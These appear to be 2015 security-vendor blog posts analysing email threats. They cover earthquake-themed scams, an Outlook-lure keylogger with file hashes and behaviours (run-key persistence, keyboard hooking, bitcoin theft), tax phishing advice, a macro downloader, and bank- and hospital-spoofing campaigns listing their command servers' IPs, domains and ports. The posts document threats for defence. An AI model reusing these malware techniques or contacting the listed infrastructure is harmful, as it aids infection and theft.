As most people know by now, a large earthquake struck Nepal a few days ago causing massive amounts of damage and deaths in the thousands. After most large tragic events like this, unfortunately scammers come out of the dark corners of the internet to take advantage of the publics kindness in wanting to assist in situations like this. We’ve seen it many times and unfortunately with the Nepal earthquake, it’s no different.

We’ve been seeing a slow influx of messages mentioning the earthquake as an attention getter for normal spam. Things like diabetes medicine spam will have a quick news sentence at the top about the earthquake to get a users attention and then go on to try and sell whatever the original goal was. We’ve also seen customized 419 scam messages coming in claiming to be victims of the earthquake. The theme is similar to normal 419’s where they want you to help them with their large amounts of money, but specifically focused around recent events with the earthquake.

Screenshot from 2015-04-29 08:53:32

There have been some emails claiming to be part of relief funds that are just phishing for responses as well. Responding to messages like this opens up a can of worms allowing the attacker to focus on the user and try to convince them to send money somewhere. In a case like a large disaster, they may focus on using guilt to force a user in to sending money which can be a very effective method.

Screenshot from 2015-04-29 08:48:51

There was a small virus campaign that happened as well. It looks like the exe was having some issues though since it seemed to keep crashing shortly after starting. However I did see some keyboard hooking so it was most likely a small keylogger that would record keystrokes and send them off to a remote server.

Screenshot from 2015-04-29 08:56:27

 

 

It’s always unfortunate to see spammers and virus campaigns focus on taking advantage of peoples good will in wanting to help. We always see these types of things after world news worthy events and we will probably continue to see it. This doesn’t mean users should ignore any emails asking for support or help since there will be legitimate companies and organizations seeking support. But users should be mindful of emails pertaining to recent events since that can be a major focus in campaigns over the coming weeks. Researching charities or dealing with known companies on their public websites and avoiding unknown or unexpected attachments are good steps to make sure you aren’t getting scammed or running viruses.

 

wormhole_1Yesterday we began seeing a malware campaign posing as a message from “Microsoft Outlook”. The messages pose as a notification to the user that they have exceeded their mailbox storage limit. They advise the user to open the attachment to upgrade their account. The attachment in these messages is an ACE (.ace) archive that contains a malicious SCR (.scr) file. ACE is a data compression file format similar to the more commonly used ZIP or RAR files and though it is not as commonly used as ZIP or RAR, unpacking ACE files is supported my many third party archivers so it should not pose a problem for most users. The file inside is a rather large (643kb) SCR file named updatemail(dot)ace.

outlookvirus

While the majority of malware hitting our filters each day contain an smaller Trojan ‘dropper’ file that pulls down additional malicious software from the internet, this particular piece contains all needed functionality in the original attached file. In other words, it has no need to pull down more malicious software from the internet to do its damage. Once executed the malware drops a file in AppData then adds to run regkey to ensure that it remains running on the system at all times in the future. It also immediately registers a hook to monitor keyboard input (keylogging) as well as setting up a listener on TCP port 49202. We also observed the malware attempting to harvest bitcoin that might be stored on the user system. We also observed a self-propagation functionality via smtp so we can likely expect to see more of these in the future.

File Name Updatemail(dot)ace
MD5 7e46f98e98eb39d13ddfaa66551181b7
SHA1 6baeced8fdf6c93a024167fb961e5037b59e5006
SHA256 eb97f6d0a454e0034e06d16e69ab6dddbf9d3d8e790e66003d6b3cfebd9d29e7

When W2’s started arriving earlier in the year, we saw an increase in the amount of tax-related spam attempting to phish users for sensitive data or infect their PC’s outright.  It’s no surprise then that 2015 has been quite a busy year for tax scams of all sorts.

Early in the year, Intuit (the company that owns the very popular tax software/service Turbo Tax) announced that it was shutting down state tax filing capabilities due to a recent rash of “suspicious” filings. The news came at a time when millions of US citizens were filing federal and state tax returns that resulted in a partial service outage (albeit temporary) for the most used online tax prep software provider in the US. The shutdown came on the heels of Minnesota deciding to stop accepting filings from Turbo Tax due to potential fraudulent activity. A full investigation is still pending but Intuit’s initial response was that the false filings were not a result of a breach of their internal network but rather occurred by some other means.  It stands to reason that the perpetrators may have utilized username/password combos stolen in any of the multitude of recent breaches that were being shared across multiple accounts. Or perhaps they were harvested through one of the many tax-themed phishing campaigns that we see hitting our spam filter on a daily basis.

We have seen hundreds of variants of tax-themed email campaigns attempting to dupe users in the first quarter of 2015. The majority of messages contain malware as an attachment or use a URL that leads to a malicious payload.

More and more users are filing their taxes electronically, and in the eyes of unsuspecting users, an email such as the one pictured below, may look legitimate.

tax

This particular variant is quite simple and instructs the user to follow a link to view a message from the IRS regarding their tax documents. To the average user, these message look exactly like what a tax document email from the IRS should look like, the only problem is…the IRS “does not taxpayer communications through e-mail and won’t send a message about your tax account”. As is customary in these types of the messages the URL will lead to either a malware infection or a phishing landing page.

So, what can you do to stay safe this tax season?

 

  • Keep your Browser and Operating System up to date. Both receive frequent updates, many of which include fixes for vulnerabilities that could be used in an attack against an innocent taxpayer.
  • Online fraudsters (a.k.a. “phishers”) will attempt to contact taxpayers via email. Please note: the IRS will never initiate contact with a taxpayer through email.
  • The IRS will never ask you for PIN numbers or credit card information in an email
  • Never click on a link, or an attachment, from an unsolicited email.
  • You should never conduct unsecured transactions that include any account or password information over public hotspots including airports, hotels, libraries, restaurants, cafes, or other locations that offer free WiFi.
  • Always and completely log out of sensitive sites. It is possible for an attacker to hijack a session that has been left open.
  • Do not file online using the same computer that your kids do. A good portion of online scams and spam target today’s younger generation of Internet users.
  • Remain vigilant and try to use simple logic – if it seems too good to be true, and it is sitting in your inbox, delete it. Especially if it is from someone you did not initiate contact with.
  • Before entering sensitive information into a website, look for the security padlock symbol.
  • Create strong passwords; choose passwords that are complex and utilize a combination of upper and lower case letters, numbers and symbols.
  • Limit Your Exposure Through E-mail and Web. It is perhaps online behavior that bears the most scrutiny. Mitigating the risk through the use of a reliable e-mail and Web filtering solutions are essential.

remit

In what appears to be more work from the same people who brought you Jon French’s blog post last week, we began seeing a blast of malicious spreadsheets pouring into our filters this morning. The emails that carried them had some minor randomness in their subject lines but all shared the line “Remittance Advice for” followed by a random decimal number and a random company name such as JP Morgan or Powerchip Technology. The bodies of these emails simply restated the random company name found in the subject line along with the name that was spoofed as the sender. The attachment was a seemingly blank xls document. Underneath the hood however was a malicious VBA macro that attempts to download an executable masquerading as a gif file from a remote server. The macro uses some minor obfuscation in the form of ASCII integer values in place of more readable text values to hide its intent.

vb1After a quick conversion, we can see that this script is attempting to download the file ddls.gif from the IP 91.215.138.84 which is located in Moscow Russia.

vb2Even though the server at this IP is up and responding, it is no longer fulfilling requests for this file, so I can’t quite say what it’s intentions were, but you can likely bet on a keylogger in there somewhere, in addition to other things as per usual.

At the time of analysis these xls docs scored a whopping 0/57 on Virustotal meaning that none of these AVs recognized them as malicious. It’s unclear as to how long the communication between the file and the remote server was active in order to download the major payload (ddls.gif), if it was at all, but it didn’t appear to be very long.

Emails purporting to come from Stanford Health Care deliver malware inside an attachment entitled Customer_department_offer.zip. These emails will use one of six different subject lines in their attempts to trick recipients into fall prey to their campaign. They include: “Special offer”, “Health Care”, “Thank You”, “Important”, “check out”, and my favorite “Stanford Medecine”[sic]. I enjoy the fact that this particular subject line misspells the word “medicine” especially considering the proper spelling is right there in the graphic they used to spoof Stanford to begin with, but I digress.
stanford

This campaign is directly related to similar campaigns that we have been seeing on a daily basis that usually begin in the mornings as people in the US are getting into work, usually around 6am cst and last for just over an hour delivering right around 1 million pieces. The functionality in these campaigns is the same, as is the fake pdf icon attached to the zipped up executable. The main difference between them is the entity in which they decide to spoof and the contact domains and IPs that the malware attempts to reach out to. This particular campaign reaches out to the domain estelareventos.com as well as an IP in Ukraine 141.105.141.87 on port 13912.

This just in, as I was writing this post the same group began sending yet another campaign, this time impersonating Chase bank which they have been keen to do. This time the malware attempts to connect to sncielles.de, restaurantesdeasturias.com, and 141.105.141.87 again, this time on port 13923.

chase